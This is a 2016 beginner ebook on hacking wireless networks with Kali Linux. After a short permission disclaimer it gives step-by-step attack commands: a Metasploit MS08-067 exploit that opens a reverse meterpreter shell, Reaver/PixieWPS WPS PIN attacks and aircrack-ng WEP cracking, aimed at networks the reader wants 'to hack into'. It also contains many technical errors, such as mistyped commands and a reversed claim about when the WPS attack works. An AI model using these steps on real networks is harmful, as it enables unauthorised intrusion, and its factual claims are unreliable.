WIRELESS

HACKING

HOW TO HACK WIRELESS NETWORKS, A STEP-BY-STEP GUIDE

FOR BEGINNERS
JAMES SQUIRES
 CONTENTS

Copyright

Intro

1. Hacking: How to Hack Wireless WEP/WPA/WPA2 Networks in 2 Hours: A Step-by-Step Guide for
Beginners

2. What Is Kali Linux?

3. What Is a WEP, a WPA, and a WPA2?
4. Downloading Kali Linux
5. How to Setup and Install Kali Linux on a USB Key
6. Virtualization and Using Virtual Box
7. Using PixieWPS with Kali Linux
8. Step-by-Step Guide to Running and Using Kali Linux
9. Hacking WAP and WAP2
10. Additional Resources

11. Feedback
All rights reserved.
Copyright 2016 - All rights reserved.
In no way is it legal to reproduce, duplicate, or transmit any part of this document in either electronic means or in printed
format. Recording of this publication is strictly prohibited and any storage of this document is not allowed unless with
written permission from the publisher. All rights reserved.
The information provided herein is stated to be truthful and consistent, in that any liability, in terms of inattention or
otherwise, by any usage or abuse of any policies, processes, or directions contained within is the solitary and utter
responsibility of the recipient reader. Under no circumstances will any legal responsibility or blame be held against the
publisher for any reparation, damages, or monetary loss due to the information herein, either directly or indirectly.
Respective authors own all copyrights not held by the publisher.

Legal Notice:
This book is copyright protected. This is only for personal use. You cannot amend, distribute, sell, use, quote or
paraphrase any part or the content within this book without the consent of the author or copyright owner. Legal action
will be pursued if this is breached.

Disclaimer Notice:
Please note the information contained within this document is for educational and entertainment purposes only. Every
attempt has been made to provide accurate, up to date and reliable complete information. No warranties of any kind are
expressed or implied. Readers acknowledge that the author is not engaging in the rendering of legal, financial, medical
or professional advice.
By reading this document, the reader agrees that under no circumstances are we responsible for any losses, direct or
indirect, which are incurred as a result of the use of information contained within this document, including, but not
limited to, errors, omissions, or inaccuracies.
 INTRO

How To Hack Any Wireless Network! A Step By Step Guide For Beginners
By James Squires
 1

HACKING: HOW TO HACK WIRELESS WEP/WPA/WPA2

NETWORKS IN 2 HOURS: A STEP-BY-STEP GUIDE FOR
BEGINNERS

T he mention of the word hacking brings to mind all sorts of illegal activity, so lets get
a disclaimer out of the way first of all. We are not supporting any illegal activity
whatsoever. The hacking methods presented in this book are intended to be used by
information security professionals and network security personnel. You should only be
using this information in a way that is legal in your location.
Network hacking should only be performed on networks that you have permission to
perform hacking on. You will want to check to make sure that it is legal for you to do so in
the city, state and country where you live.
The methods presented in this book are meant to be used to check for security leaks, to
strengthen security networks and to help private networks operate more smoothly.
Now that weve gotten the legal essentials out of the way, lets talk about how you will go
about hacking your network. If you want some guidance beyond what is covered in this
book, check out the additional resources . There you will find instructions on how to
receive free videos delivered straight to your inbox. Just enter your email address on the
site, and we will send you free step-by-step videos to help you out with all sorts of
common operating system problems. Youll learn some new tricks and be able to better
control the operating system and keep your security tight.
Getting to Know Linux
In order to use the tools well be talking about, you need to have a basic understanding of
Linux. Linux is an open source operating system, which means that anyone can modify it
or distribute it. Its free to use and download, but specialty Linux programs, developed by
various corporations to be used for more specific purposes, can cost you. The developers
will sell those modified Linux systems to whoever is interested in them. So while Linux is
free, if you want something different than the vanilla Linux system, you may have to pay
for it.
Linux is a lot like Windows, in that it is an operating system. It basically allows all the
programs on your computer to work together under a unified system. Without an operating
system, you cant use the programs on your computer. But Linux can work practically
anywhere- on your phone, tablet or even your wristwatch. It is constantly changing too,
being updated and modified by developers and companies all over the world. New
versions of Linux come out more often than any other operating system, so its a good idea
to familiarize yourself with the latest version before you get too far into some of the tools
we will be using.
Our Approach to Hacking a Network
Using the step-by-step guides we have laid out for you in this book, you can learn how to
hack into a wireless network, and youll be able to do it in as little as two hours. It may not
be a very simple process, but we will simplify it for you as much as possible. Were going
to assume you are new to all of this and that you dont know all the terminology and
processes. That way, this book can be used by practically anybody. If you already
understand some of the steps, then you may want to skip ahead to the part of the process
that is giving you trouble. Were going to go slowly through all this to make sure you fully
understand it and that you have no problems getting into your network.
Live Operating Systems
A live operating system is one that is portable. It can be downloaded into a USB drive or a
DVD. You might hear it called a OS (operating system) on a stick or even a computer
on a stick. This basically means that it can be taken anywhere on a USB stick. The
operating system can function much like a computer sometimes, even holding files and
programs, so you can essentially take your computer with you.
If you plug that live operating system into the USB port on a computer that is already
running Windows or Mac OS or UNIX, then it will still be able to use the operating
system you have on the stick. In this case, we are talking about Linux or a version of
Linux. Once you plug your USB stick in or insert your DVD, the operating system
contained on that portable media will temporarily override whatever operating system is
currently in use on the computer. It wont make any permanent changes to that operating
system. It just takes over for a while. Once you remove your media, then your operating
system goes with it and the computer, phone, tablet, etc. can just go back to normal.
Now, this is really useful when you are trying to perform security checks on computers
that run on your companys network. If you are in charge of network security, you may
need to check individual computers, but you want your programs and files to be accessible
through that computer so you can perform diagnostics. The live operating system is the
perfect solution for that, and it allows you to take what you know and what you are
familiar with and use it anywhere.
Were going to show you how to do that.
 2

WHAT IS KALI LINUX?

N ow we talked about versions of Linux that are modified by companies or various

developers for specified use. Thats what Kali Linux is, and it is specialized to provide
network security. In some ways, it is very basic. It wont work with a lot of programs,
because it isnt meant to provide general operating system services. It doesnt work quite
like Windows or even the basic Linux system. Instead, it is laser focused on network
security.
We will be using Kali Linux in our hacking guides, so were going to cover what its all
about.

How to Get Kali Linux

While Kali Linux is used by security professionals all over the world and is a highly
specialized version of Linux, it wont cost you anything. The developers vow that it will
always be free, even as they continue to provide support and updates for their version of
Linux. They also make sure that modifications are not being made to the OS by just
anyone. They call Kali Linux an open source OS, but one that is developed by a small
group of people under very tight security. They vet all changes carefully and make sure
that absolute security is maintained on the product.
You only want to download Kali Linux from a verified source. The following pages
https://www.kali.org/downloads and https://www.offensive-security.com/kali-linux-
vmware-arm-image-download/ both offer secured versions of Kali for you to download.
What Kali Linux Does
This kind of operating system is known as a distribution and it is designed for penetration
testing and security auditing. It is meant for a single user at a time. This limits the
potential for security breaches.
In fact, this system is very particular about security, since it is designed for people who
work in information and network security. It can be modified to allow for more users and
to become compatible with many programs, but that isnt advisable. That can compromise
the security of the system, which defeats its purpose.
It is recommended that you work within the parameters of the Kali Linux system so as not
to allow in any potential security breaches. Because it is such a closed system, it wont be
compatible with programs that permit a lot of online interactions or open sourcing. So
Steam wont work with it at all, nor will Launchpad and many other commonly used
programs. If you want to run those programs, then you should really use a different
operating system that isnt designed to be as narrowly focused as this one is.
If you try to install additional programs on Linux that connect to a network, such as
Bluetooth, then you wont have much luck. These kinds of services are disabled under the
default settings used by Kali Linux. The distribution is intended to remain secure, and
unless you tamper with the settings it will stay that way, even to the detriment of the
programs you want to use on it.
You can tamper with the program as much as you like, opening it up for compatibility with
just about anything, since it runs off of Linux. But thats not a good idea if you want to
maintain security. As you get more used to how it works, you can do more with it and
modify it as you like, but when you first start out, you probably shouldnt try to tamper
with it. Wait until you are more familiar with it to start doing high-level modifications.
 3

WHAT IS A WEP, A WPA, AND A WPA2?

Y our Wi-Fi network is what connects all your internet-capable devices together in one
area. In an office building, that network connects all the computers, scanners, tablets and
other devices. This can give them a measure of shared security, as it makes it difficult for
outside forces to penetrate and become part of the network. It conserves resources and
helps the company maintain control over their computers security.
But how secure is your network? That will partly depend on what kind of security
classification your Wi-Fi has. We are going to look at three types of these- WEPs, WPAs
and WPA2s.
If you are reading this chapter, then you probably never paid much attention to the few
letters beside your Wi-Fi networks name. You may not have thought they mattered, but
somebody had to pick one of these choices when they first set up the wireless network you
are using. Odds are, they didnt think too much about their choice and just went with the
most obvious one.
But that can be a mistake. These encryption standards determine how secure your network
is. If someone is getting into your system and using your Wi-Fi to do something illegal,
then the FBI are going to be having a visit with you. They may get to the actual infiltrator
eventually, but they will start with the Wi-Fi source. Knowing how to keep out intruders is
a big part of running a secure network. Before you can do that, you first have to
understand the security classifications for Wi-Fi networks.
WEP
Wired Equivalency Privacy, or WEP, is the Wi-Fi security algorithm that is used in most
places around the world. Part of that has to do with how long it has been around, and a
part of it is just because it is usually the first choice in a list of security algorithms. People
who dont know much about these just assume that the first choice is the best, which is
why it is considered the default option. They dont understand what the difference is
between these choices.
WEP became the standard back in 1999, but it was never very strong. As technology
advanced, stronger versions of WEP were introduced, but most of the time, the majority of
people were still using the relatively weak versions.
This standard lost its value over time as weaknesses were discovered. When computing
power increased to the point where it because a simple matter to break the encryption and
discover the Wi-Fi password, WEP was dropped as the standard by the Wi-Fi Alliance in
2004.
WPA
Wi-Fi Protected Access, or WPA, was meant to replace WEP as it began to show signs of
weakness. The Wi-Fi Alliance formally adopted it in 2003. All WPA keys that are used are
256-bit, which makes them much stronger than the keys commonly used in WEPs (64 and
128-bit). The keys refer to the level of encryption the system has, and WPAs was
remarkably stronger than its counterpart.
WPAs have message integrity checks which look for packets of data that have been altered
or captured by an infiltrator as these packets pass between the client and the access point.
The key system is even a lot more advanced than what was being used before. The
original key system that came with the WPA is outdated now, but at the time, it was a huge
leap forward for network security.
But the WPA has some security flaws. It came with some of the same capabilities as its
predecessor, including a TKIP (Temporary Key Integrity Protocol), which required that
the device accept firmware updates regularly. This presented a backdoor for the system,
which hackers were soon able to exploit.
The WPA is more secure than its predecessor, but it is also still vulnerable to attack. This
has been shown time and again in public demonstrations. Even though it is harder to break
into, and supplementary systems usually serve as the access point for intruders rather than
the algorithm directly, the vulnerability is still there.
WPA2
Wi-Fi Protected Access 2, or WPA2, took over for the standard WPA back in 2006. Thats
not to say that the older, less secure algorithms arent still available, because they are.
The WPA2 still uses TKIP, but it is considered a fallback system to be used only if the
primary system fails. What replaces TKIP is the CCMP, or Counter Cipher Mode with
Block Chaining Message Authentication Code Protocol. This new protocol is excellent at
determining if messages entering the algorithm are authorized, making it very difficult to
infiltrate the system.
This system still has its weaknesses, but they are far fewer and much harder to exploit.
Because this kind of algorithm is so incredibly difficult to penetrate, the only entities who
use it that would have to worry about infiltration are large companies that deal with
corporate espionage. It simply isnt worth the effort it would take to break into this system
for the information contained on the average private network.
AES
We cant talk about WEP, WPA and WPA2 without mentioning AES. It stands for
Advanced Encryption Standard, and it is a specification of a security algorithm. Often,
AES is included in a WPA2 algorithm, but it may not always be by default. For the very
best security, you want to partner a WPA2 security algorithm with AES. That will give
you unprecedented levels of security and make your network practically impenetrable.
Which One Should You Use?
If you have the resources and the processing power to handle it, you definitely want to go
with a WPA2 security algorithm, preferably with AES activated as well. But not everyone
will have that kind of processing power available to them.
If you dont have much processing power or resources at your disposal, then using a
WPA2 security algorithm on something like a small, personal network would not be
advisable. It can lower your connection speeds, create performance problems and
unnecessarily bog down your system.
For any enterprise-level networks, however, WPA2 with AES is recommended. It provides
the most security, and most medium to large businesses have the necessary resources to
run it smoothly without any hiccups in their internet speed.
 4

DOWNLOADING KALI LINUX

Y ou have to be very careful about where you download Kali Linux from. There are
plenty of facsimile versions out there that are not made by the original developers. It
would be very easy for an unscrupulous individual to slip in a virus or some other
malware that could compromise your network. Thats why you have to make sure you are
getting not only a pure copy of the operating system but also that you are downloading
it from a trustworthy source.
The best way to certify that what you are getting is the real deal is to verify the SHA1
checksums against a standard value.
If you want to run the Kali Linux OS from a USB (which is necessary to hack a network)
then you will need to obtain a bootable ISO image. A 32-bit or a 64-bit image will work
fine.
You may not be quite sure what architecture your system has that you want to run the
system on. If thats the case, then you can run the command uname -m. Just input this
on the command line on your Intel-based PC. A response will come back. If it says
x86_64 then you should be using the 64-bit image. That one will have amd64 in the
name of the file.
You might get the response 1386. If that is the case, then use a 32-bit image. This will
have i386 in the file name.
If you have a Windows OS, then the procedure will be a bit different. For Windows 7 or
Windows Vista users, you can begin by opening the Start menu. Go to Computer, then
click on Properties. Under the System heading, view the type of system that you have.
For a Windows XP OS, the steps are similar. Go to Start to begin. Then right-click on My
Computer and click Properties from there. If you see the words x64 edition there, then
you have a 64-bit system. If nothing is written there, then its a 32-bit system.
Kali can be run as a guest under VMware. It actually already has VMware Tools installed
and can be found as a pre-built VMware virtual machine. If you want the VMware image,
you will find there are three variations- 64-bit, 32-bit and 32-bit PAE.
ARM-based devices can have varied architectures. That means that a single type of image
wont work across all the ARM machines. Youll have to download Kali Linux images
that are pre-built for ARM architecture. You can go to GitHub to find scripts that will help
you build ARM images on your own.
If you run into any trouble setting up an ARM environment that will work for Kali Linux
or you want to know how to build your own custom chroot (a root directory change
operation), you can use these articles here
http://docs.kali.org/development/kali-linux-arm-chroot

T he Kali Linux images can be found on the Offensive Security website:

OffensiveSecurity.com.
Verify the Image You Use for Kali Linux
You definitely want to make sure that you have an actual Kali Linux OS and not some
imposter. This professional penetration testing tool is meant to maintain network security.
You can use it to investigate computers and networks, and you need to be able to trust
what it tells you. If there is any problem with it and you have a version of Kali Linux that
differs from the real deal, then you can be compromising your network and your personal
information. Dont take that risk. Make sure you verify what you are getting before you
download it.
Since Kali is a penetration testing distribution, a fake version of it could cripple your
system. There are lots of these bogus versions out there and there is no shortage of people
who would want to put in some sketchy additions to this distribution.
The best way to avoid this problem is to make sure you are downloading only from the
official Kali download pages. You will need an SSL to browse these pages. Thats a
standard encryption that protects the serve and the client from interference. It basically
keeps the bad guys out. But even these sources have their weaknesses.
After you download the necessary image, be sure to verify it before you run it. You want
to validate that it is the real deal and not something that could contain malware.
The simplest way to do this is to calculate the hash of the ISOs SHA1. Then just inspect it
and compare it against the value you find on the Kali Linux site.
Once youve done all this, and you are sure you are getting an actual Kali Linux
distribution, you can then download it.
 5

HOW TO SETUP AND INSTALL KALI LINUX ON A USB KEY

K ali Linux is the best hacking tool out there. It is super secure, and it is made by
seasoned professionals who know what they are doing. Whats so great about this system
is that you can run it from a USB key and not have to worry about compromising or
altering your current operating system. When you carry this OS on a USB key, it can be
taken to any computer or compatible device and made to work. It only temporarily
overrides the current operating system on that device.
Once you take out your USB key, you remove Kali Linux from the device. It doesnt leave
behind any trace, and it doesnt change the settings or operating system of the device you
used it on. It is compatible with any operating system because it works around them.
This is considered a non-destructive way to use Kali Linux. It lets everything go back to
normal on whatever device you use it on, making no changes to the hosts system. Its also
portable, so you can take it from one workstation to the next and from one device to the
next and do what you need to do. It starts up very fast, usually in just a few minutes, on
whatever system you put it into.
You can also customize your bootable drive, using a Kali Linux ISO image that you rolled
yourself. It is also potentially persistent. This means that, once you perform the proper
configurations, your Kali Linux Live drive will keep the data it has collected no matter
how many times you reboot it.
Installing onto Your Bootable USB Key
We will start with a bootable USB drive that already has an ISO image of Kali Linux. Be
sure that ISO image is verified. We talked about this in the last chapter.
For Windows users, you will have to first download the Win32 Disk Imager utility. Youll
find that here.
https://launchpad.net/win32-image-writer
If you are using a Linux or an OS X, just use the dd command. This has already been
installed on both of those platforms.
We recommend using a 4GB USB thumb drive or larger. If you want to use an SD card,
then thats fine, since the procedure is the same for both. Just make sure the devices you
are going to be using it on are compatible with your storage device.
The method for doing this will differ depending on what OS you have. Well break it
down on both of the major ones for you.
For Windows
Start by plugging your USB drive into a USB port on a PC operating Windows. Pay
attention to the drive designator that it uses when it starts to mount. That designator will
look like F:\. Then launch the Win32 Disk Imager software. Once you open that
software, pick out the Kali Linux ISO file you downloaded. Then click Write to copy it
onto the USB drive, be sure you pick the right drive for this operation.
When the imaging process is finished, you can take out your USB. On most Windows OS,
you will need to click on the small arrow near the bottom right corner of your screen to
open a tab that shows connected devices. Be sure to click on your USB drive there to
safely eject it and ensure that no information is lost when you disconnect it.
Once all that is done, you can boot Kali Linux from your USB device.
For Linux
Doing the same thing on a Linux is equally easy. Start with the verified ISO image and
copy it over to the drive using the dd command. You have to be running as a root for this
to work. Alternatively, you can execute the dd command using sudo. The instructions
were going to give you assume that you have a Linux Mint 17.1 desktop. Other versions
are going to vary slightly, but the basic operations required for this task should all be about
the same.
Just a word of warning before we get into the actual instruction: if you arent sure what
you are doing with dd command or you just arent careful, you can accidently overwrite
something you arent meaning to. Be sure to double check everything you are doing so
you dont make any mistakes.
Start by identifying the device path you are going to use to write the image onto the USB
drive. Before the drive is inserted, perform the command sudo fdisk -1
You have to be using elevated privileges with fdisk, otherwise there wont be any output.
Enter the above command in a terminal window at a command prompt. If you did it
properly, you should see a single drive. That will probably look like this /dev/sda. That
drive will be separated into three partitions. These are /dev/sda1, /dev/sda2, and /dev/sda5.
From there, plug in the USB drive, then run the original command again. Thats sudo fdisk
-1. Once you do that, you will see another device that wasnt there initially. It could look
something like this: /dev/sdb.
Then take the ISO file and image it onto the USB device. It may take 10-15 minutes to
image the USB device, so be patient. In order to perform this process, you need to execute
the command below:
dd if=kali-linux-1.0.9a-amd32.iso of=/dev/sdb bs=512k
Lets dissect this command for a second. In the example we are using here, the ISO image
that you want to write onto the drive is named kali-linux-1.0.9a-amd32.iso. Yours may
look slightly different. Note the 32 in the name. This refers to the size of the image. We
use the blocksize value bs=512k because it is safe and reliable. You can make it bigger
if you want, but that can cause some problems, so it isnt recommended.
Once the command is completed, then it will provide feedback and not before then. Your
drive could have an access indicator. If it does, then it will blink every so often. How long
this whole process takes will depend on a few factors- how fast your system is, what kind
of USB drive you are using and how well your USB port works. The output, once the
imaging is complete, will tell you how many bytes are copied and give you numbers for
records in and out, which should be the same number.
Now your USB is ready to boot into a Kali Live environment.
 6

VIRTUALIZATION AND USING VIRTUAL BOX

K ali Linux lets you use its own operating system without interfering with the original
operating system on whatever computer to other device you are trying to hack into. Weve
covered this already, but what about those instances where you want to test programs that
are not compatible with one OS or another?
Thats where virtualization comes in handy. It allows you to set up an outside system that
works with the existing operating system. Then you can just pick and choose which
program you want to test. You can take a program that works only on Windows, for
example, and run it through your Kali Linux distribution while you have your USB with
Kali Linux plugged into the host device. But you will need a virtualization program.
Thats what Virtual Box is, and it does a lot more than just let you test specific programs
that wouldnt normally be compatible with the OS you are using. It also allows you to run
operating systems that no longer work on your current hardware. Your computer may not
be able to run an old DOS operating system, but when you use a visualization tool like
Virtual Box, you can run that operating system again.
You can also run multiple operating systems at once. We talked about how Kali Linux
temporarily overrides the operating system of whatever device you have it plugged into.
But once you have Virtual Box running, you can essentially have both Kali Linux and that
host operating system going at the same time. It gives you lots more options, allowing you
to do far more than you could otherwise.
You can also save the state of a system and make that system revert to its old state
whenever you want. That gives you tons of room to play around with. You can experiment
and try different things, then when you make a fatal error, you can just revert the system.
Virtual Box can be found on VirtualBox.org. It is an open source tool, so it is constantly
being updated and its free. Like with all the other tools we cover in this book, you only
want to download if from the original source. If you get it anywhere else, it could be a
bogus version that is corrupted with malware.
Virtual Box is compatible with just about any operating system, so you shouldnt have any
trouble getting it to work with whatever you have. The limits of Virtual Box come down to
your processing power and memory. You can run as many virtual machines inside your
device as you have memory for. You can also have as manty programs running
concurrently from as many operating systems as your device can handle.
If you have not done much hacking before, then Virtual Box is an indispensable tool. You
can save your computers current state to restore it later in case something happens.
Individuals who try hacking for the first time on their computer often make mistakes they
wish they could take back. Using a Virtual Box, they actually can.
This tool can be added to your USB drive and work in conjunction with Kali Linux, so its
no problem to take it with you where you need to go.
 7

USING PIXIEWPS WITH KALI LINUX

T he latest versions of Kali Linux already come prepackaged with a program called
PixieWPS. It works really well with Kali Linux and is an obvious partner for it.
What PixieWPS does is perform an attack on a network. It guesses the pin number or
password for the network. This is something that had to be done manually in the past, but
thanks to PixieWPS it is now automated. This attack, called a pixie dust attack, can guess
most network passwords in as little as 1 second and as much as 30 seconds. How long the
process takes will depend on the networks security.
The PixieWPS tool actually came into existence out of the Kali Linux forums, so its
entire history has been linked to this distribution.
If you dont have PixieWPS on your Kali Linux distribution, then you are probably
running an older version. You can simply use the following command to get an update for
that program and start running the current one with PixieWPS included: apt-get update.
Running PixieWPS
Generally, PixieWPS works best with Reaver, which is a complementary program that
aids in the offline network attack. Were going to assume you have Reaver installed with
your Kali Linux for this guide.
In order to obtain Reaver, you can go to GitHub and download it- that is, if you dont
already have it. Like PixieWPS, Reaver should already be installed on the latest version of
Kali Linux. This open source tool uses a brute force approach to hacking into a Wi-Fi
network. PixieWPS helps refine its approach and ensure that it doesnt take very long to
get the desired results- namely, access to the network.
Now, Reaver will sometimes time out or get stuck in a loop. It will just do the same thing
over and over again. When this happens, you should just let it run. It will eventually work
itself out. make sure you keep it close to the router so it doesnt have any trouble accessing
the network.
If you feel like the pixie dust attack is taking longer than you would like, you can always
come back later. Just pause the program with Ctrl+C. This will save your progress, and
you can come back later and start back right where you left off. Sometimes, there are
factors that prevent the attack from being completed in the usual 30-second timeframe.
There may be network problems, compatibility issues or other problems that are hindering
your progress. Just know that you dont have to perform the entire attack in one go.
Once you have all the requisite programs on Kali Linux, you can launch a pixie dust attack
pretty easily. Just put your interface into monitor mode. You do that with the command
airmon-ng start. Then you can start looking for a target. Use the command wash -i on
the monitor interface.
You will need the BSSID (individualized router number) and channel number of the router
before you begin the attack. You also want to make sure your signal is strong.
You can launch your attack by entering the command reaver -i (monitor interface) -b
(BSSID of the router) -c (the routers channel number) -vvv -K 1 -f.
That should give you the password shortly. This isnt something that will work on every
router, but most of them should be susceptible to it. Using PixieWPS is almost always
more effective than some sort of brute force tactic, and it works lots faster.
 8

STEP-BY-STEP GUIDE TO RUNNING AND USING KALI LINUX

O nce you have Kali Linux downloaded and you are near a network you want to hack
into, you can start the hacking process. Below are a few step-by-step guides on how to do
it.
Basic Hack for Older Windows Systems
Were going to start with a very basic hack that works on many older operating systems. It
might not be the most practical one, but its a good starting hack for beginners. With this
hack, you can get a good sense of what is involved and work up from there.
1. Start up Kali Linux and open a new terminal up.
2. Then start up Metasploit. This is a program that is already included on Kali
Linux. It will perform an attack on the network. You can start it up by typing in
msfconsole as a command. This may take a few minutes, so be patient.
3. Once Metasploit starts up, you can type in some commands that will progress the
hack. Here they are in order:
use windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST (your IP address) [You might not know what your IP address is. You can
find out by just opening up a new terminal and typing in the command iconfig. Youll
see your IP address in the output.]
set LPORT 4444
set RHOST (the IP of the target network)
set RPORT 445
exploit
One you do all that, you should connect. If you arent sure what to do or what commands
are available to you, just type in help and a list of commands will be displayed.
1. Now you are in. Youve successfully hacked the computer, and you can check for
network weaknesses or whatever else you need to.
There is good a chance that this exploit wont work. If the target network has blocked port
445, then you will need to use a different tactic. Also, some newer versions of Windows
will automatically block this exploit. Thats okay, because we have some more methods of
hacking for you to use.
General WEP Hack
This next hack is going to be more useful for current operating systems and networks.
Here we go:
1. Determine the name of the wireless adapter. It is possible that the target computer will
have multiple networks. If that is the case, then you will have to know of the name of the
one you want to scan. You are looking for one that says wlan. If it says eth for
Ethernet or lo for loopback, then it wont be the one we are looking for. To see all the
adapters the computer has, type in ifconfig using a terminal. Just take note of the wlan
adapters.
2. Turn on monitor mode. You can do that by using the airmon-ng start wlan0 command.
The 0 in this command stands for the network you want to hack into. Just set the
number of the network of your choice in place of that 0. Typing in this command will
create a virtual console which is known as a monitor. It may be called mon on your
display.
If you are using the latest version of Kali Linux, you may see a different name for the
monitor than just mon. It could be mon0 or wlan0mon. Also, the airmon-ng
command may not work properly for you. If that happens, try using airmon-ng check kill.
This command looks like this: airmon-ng <check|check kill>.
3. You can begin capturing packets. This simply means you are intercepting pieces of data
that are moving across the network connection. You can use the airodump-ng command
to begin the capturing process. This will take data from the packets that are moving
through the air. When you do that, you will see the name of the target network.
4. From there, you can store the packets you capture in a file. Do this by using the
airodump command. The full command you will use will look like this: airodump-ng
mon0 (plus the name of the file you want to capture). In this example, the 0 in mon0
is the name of the network. So the number you use may vary from the example given.
You can find the packets you captured in files that look like this: (name of the file).cap.
You cant do this right away though. You have to wait until there is enough data available.
1. The Wi-Fi is cracked. At this point, you can just type in the command aircrack-
ng in order to determine the password. Remember, this takes a few seconds, so
dont expect instant results every time. This command needs to be performed in a
new terminal.
2. The program may ask you which Wi-Fi you want to hack into, but only if there is
more than one to choose from. You should get in pretty fast, if the password is
weak. For very strong passwords, you will need more packets. The program is
going to try again for itself once you have 15,000 packets, and if it is
unsuccessful, it will keep trying at each new 5,000 packet milestone.
 9

HACKING WAP AND WAP2

H acking into a WEP network is pretty easy. The security just isnt that tight, as we have
previously discussed. To hack into a WAP or WAP 2 network will take some extra effort.
You might not even be able to find a way in using Kali Linux. A brute force attack could
take as long as several years. It depends on the length of the password and various other
factors that create security for the network.
The problem with WPA tech is that it can be really hard to configure. To make it easier,
WPS is added to complement WPA, but it does come with an exploitable hole, and
programs like Reaver are excellent at getting through that hole. The attack can still take
several hours to complete, but it is better than not being able to get through for years.
WPS sends an 8-digit pin to the client. These pins only contain numbers, so there is a
limited number of guesses it would take to crack it. Still, with all the possible choices,
trying each guess can take a very long time. WPA uses characters, numbers and letters, so
guessing the password can be infinitely tougher. In WPS, there will be a slight delay in
waiting for the APs to respond. You will probably only be able to get in a few keys per
second. Even at that speed, it can still take years to get in, but thankfully there are some
weaknesses to exploit.
We know that the 8th digit is always a checksum of all the previous digits. This cuts down
the possibilities considerably, but it would still take far too long to make it worth our
while. We can also break down the pin number into two separate parts, which makes the
work go twice as fast. What this boils down to is 11,000 guesses, though odds are we
wont have to exhaust them all before we find the answer. This means it should take about
three hours to go through every guess, so you are looking at somewhere less than three
hours for the hack. If you are trying keys slowly, though, it can take much longer.
To perform the attack, you wont need to do a lot of complicated work. If you have
everything in place, then you can simply put in the command:
reaver -i (interface-name) -b (BSSID of your target)
If you know how to hack a WEP, then this is basically the same process. We are working
with Reaver this time, which makes things easier for you, but it is still harder overall,
since you are hacking into a WPA or WPA2 instead of the much simpler WEP.
 1. Start up Kali Linux, then begin monitor mode. The command for that is: airmon-
ng start wlan0. Like with the last hack we showed you, the 0 represents the
network name which is a number). Once you know that name, substitute our 0
for the correct number.
2. You will need the BBSSID number of the network you are going to hack into.
3. If WPS is enabled, then this hack wont work. If you want to check WPS
activation, then use the wash command or airodump-ng Using wash is pretty
easy since it is designed specifically for this purpose.
4. The wash command goes like this: wash -i mon0. Remember to substitute that
0. This will also start up your system in monitor mode. If you see any networks
after you have used wash, then WPS is enabled and you will likely have to give
up.
5. The BSSID number will need to be combined with Reaver for your next
command. This is reaver -i mon0 -b (BSSID number). Reaver has more
advanced options you can use, and you may want to make use of them to increase
your hacks efficiency. The -vw option, for example, makes your tool more
verbose, telling you what is happening right on your terminal. So if you are
experienced at hacking and using Reaver, then this is an invaluable asset. It also
helps you sort through problems as they happen. If you are going to use this tool,
just type in the command reaver -i mon0 -b (BSSID number) -vv
6. Now youre in. If you are having any trouble or the process is taking far longer
than it should, then you may need to kill some processes. This will free up some
memory for you to use.
If you need more information please check the additional resources section of this book.
 10

ADDITIONAL RESOURCES

H ere are some hacking software tools you can use to make your life a little bit easier.
Its best to start out with what was covered earlier in this book. Then, once you are
comfortable, move on to test some of these out.
Aircrack
This ranks among the most popular password crackers out there. It comes with an
installation tutorial, so it should be easy enough to use. It performs a WEP attack so make
sure that you are using this software for the right kind of network. You should also ensure
that the wireless card can inject data packets. If it cant, this tool wont be much help to
you. You can find Aircrack right here.
http://www.aircrack-ng.org/
Airjack
You will be exploiting man-in-the-middle flaws with this tool. Its a packet injection
program that is available right here.
http://sourceforge.net/projects/airjack/

O nlinehashcrack.com
Using a dictionary attacks guesses passwords for you automatically. It works on WPA
networks, and you can find it right here.
http://www.onlinehashcrack.com
CommView for Wi-Fi
This protocol analysis tool also performs wireless monitoring. It can decode packets from
both WEP and WPA networks. If you want to keep track of Wi-Fi traffic so you know
exactly who is using your network, then this is a great tool for you. Youll be able to get it
here.
http://www.tamos.com/products/commwifi/
inSSIDer
This one will cost you, but it is an award-winning scanner. It works on most versions of
Windows as well as OS X. It is used to sniff out network LANs, and you can find it for
about $20 here.
http://www.inssider.com/
OmniPeek
OmniPeek only works on Windows OS. It is a network analyzer that captures traffic from
the network. You can find this excellent troubleshooting tool here.
http://www.wildpackets.com/products/distributed_network_analysis/omnipeek_network_analyzer
WireShark
Like the inSSIDer, the WireShark is great for analyzing network protocols. You can check
network traffic with it, but it helps to have a decent understanding of how network
protocol works. Youll find this one here.
https://www.wireshark.org/
WepAttack
This Linux tool is open source, and it is great for breaking keys from 802.11 WEP
networks. You will need a WLAN card for it to work, and it uses a fairly standard but
somewhat slow dictionary attack. You can find it here.
http://wepattack.sourceforge.net/
The majority of these are available for free and are updated regularly. So you should not
have any problem downloading them and testing them out. You definitely want to look
into the free tools to first to see if that can do what you need before you look at paid ones.
T hank you for reading: Click or touch the image and let us know if you like our book!